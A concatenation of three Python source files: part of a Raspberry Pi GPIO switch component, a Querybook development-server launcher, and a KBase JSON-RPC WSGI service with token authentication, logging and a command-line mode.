self.__pin.on(gpio.EVENT_GPIO_STATE_CHANGED,
lambda evt: self._on_pin_state_changed(evt))
def _on_pin_state_changed(self, psce):
"""Handle the pin state change event.
This verifies the state has actually changed, then fires the switch
state change event.
:param raspy.io.pin_state_change_event.PinStateChangeEvent psce: The
pin state change event info.
"""
if psce.new_state != psce.old_state:
evt = SwitchStateChangeEvent(switch_state.ON, switch_state.OFF)
if psce.new_state == ON_STATE:
evt = SwitchStateChangeEvent(switch_state.OFF, switch_state.ON)
self.on_switch_state_changed(evt)
@property
def pin(self):
"""Get the GPIO pin this switch is attached to.
:returns: The underlying physical pin.
:rtype: gpio.Gpio
"""
return self.__pin
@property
def state(self):
"""Get the state of the switch.
:returns: The switch state.
:rtype: int
"""
if self.__pin.state == ON_STATE:
return switch_state.ON
return switch_state.OFF
@property
def is_polling(self):
"""Check to see if the switch is in poll mode."""
return self.__isPolling
def _execute_poll(self):
"""Execute the poll cycle."""
while not self.__stopEvent.is_set():
self.__pin.read()
core_utils.sleep(500)
def poll(self):
"""Poll the switch status.
:raises: ObjectDisposedException if this instance has been disposed.
:raises: InvalidOperationException if this switch is attached to a
pin that has not been configured as an input.
"""
if self.is_disposed:
raise ObjectDisposedException("SwitchComponent")
if self.__pin.mode != pin_mode.IN:
msg = "The pin this switch is attached to must be configured"
msg += " as an input."
raise InvalidOperationException(msg)
if self.__isPolling:
return
self.__stopEvent.clear()
self.__isPolling = True
self.__pollThread = threading.Thread(target=self._execute_poll)
self.__pollThread.name = "MomentarySwitchComponentPollThread"
self.__pollThread.daemon = True
self.__pollThread.start()
def interrupt_poll(self):
"""Interrupt the poll cycle."""
if not self.__isPolling or self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__isPolling = False
def dispose(self):
"""Release managed resources used by this component."""
if self.is_disposed:
return
self.interrupt_poll()
if self.__pin is not None:
self.__pin.dispose()
self.__pin = None
self.__stopEvent = None
self.__pollThread = None
MomentarySwitch.dispose(self)
|
runweb.py
|
"""This file is for dev server only.
DO NOT USE FOR PROD
"""
from gevent import monkey
monkey.patch_all()
from lib.patch import patch_all
patch_all()
import multiprocessing
import os
import shlex
import sys
import subprocess
import gevent.pywsgi
import gevent.socket
from app.server import flask_app
def main():
host = "0.0.0.0"
port = 5000
if len(sys.argv) > 1:
port = int(sys.argv[-1])
debug = "--debug" in sys.argv
run_webpack = "--webpack" in sys.argv
webpack_process = None
if debug:
from flask_compress import Compress
Compress(flask_app)
# We are on the parent process
if os.environ.get("WERKZEUG_RUN_MAIN") != "true":
if run_webpack:
webpack_process = multiprocessing.Process(target=webpack)
webpack_process.start()
else:
print("Webpack is disabled. html/js/css will not be built.")
print("To make web files: python runweb.py --debug --webpack port")
else:
print("You are not running in debug mode, so files are not autoreloaded.")
print("To run in debug mode: python runweb.py --debug port")
try:
socketio_server(host=host, port=port, debug=debug)
finally:
terminate_process_if_live(webpack_process)
def socketio_server(host="0.0.0.0", port=5000, debug=False):
from app.flask_app import socketio
gevent.socket.setdefaulttimeout(30000)
print("Running Querybook(w/ socketio) in port: {}".format(port))
socketio.run(flask_app, host=host, port=port, debug=debug)
def webpack():
webpack_subprocess = subprocess.Popen(
shlex.split("./node_modules/.bin/webpack --progress --colors --watch"),
stdout=subprocess.PIPE,
)
while True:
output = webpack_subprocess.stdout.readline()
if output == "" and webpack_subprocess.poll() is not None:
break
if output:
sys.stdout.write(output.decode("utf-8"))
def terminate_process_if_live(process):
if process is not None and process.is_alive():
process.terminate()
if __name__ == "__main__":
main()
|
kb_JobStatsServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_JobStats.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_JobStats'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_JobStats.kb_JobStatsImpl import kb_JobStats # noqa @IgnorePep8
impl_kb_JobStats = kb_JobStats(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
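                # (the "- 1" below accounts for the ctx argument that this server
                # injects ahead of the JSON-RPC params when invoking the method)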
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_JobStats'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_JobStats.get_app_metrics,
name='kb_JobStats.get_app_metrics',
types=[dict])
self.method_authentication['kb_JobStats.get_app_metrics'] = 'required' # noqa
self.rpc_service.add(impl_kb_JobStats.status,
name='kb_JobStats.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
        except ValueError:
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_JobStats ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
                            except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
                    if environ.get('HTTP_X_FORWARDED_FOR'):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
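    # For reference, a minimal JSON-RPC request this handler accepts, using the
    # kb_JobStats.get_app_metrics method registered in __init__ (its auth is
    # 'required', so the Authorization header must carry a valid token); the
    # port and the contents of the params dict are illustrative only:
    #
    #     curl -X POST http://localhost:9999 \
    #          -H 'Authorization: <token>' \
    #          -d '{"method": "kb_JobStats.get_app_metrics", "params": [{}],
    #               "version": "1.1", "id": "1"}'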
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded python BaseHTTP service listening on
# port 9999 by default, execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
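# A minimal usage sketch for the two helpers above, e.g. when embedding the
# service in a test harness (port 0 lets the OS pick a free port, and
# newprocess=True is required so that stop_server() can terminate it):
#
#     port = start_server(host='localhost', port=0, newprocess=True)
#     # ... issue JSON-RPC requests against http://localhost:<port> ...
#     stop_server()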
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
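# Sketch of the file-based calling convention above: the input file holds a
# single JSON-RPC request ('version' and 'id' are filled in when absent) and
# the response is written to the output path, e.g. an input file containing
#
#     {"method": "kb_JobStats.get_app_metrics", "params": [{}]}
#
# could be run as process_async_cli('input.json', 'output.json', token); the
# params contents and file names are illustrative only.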
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()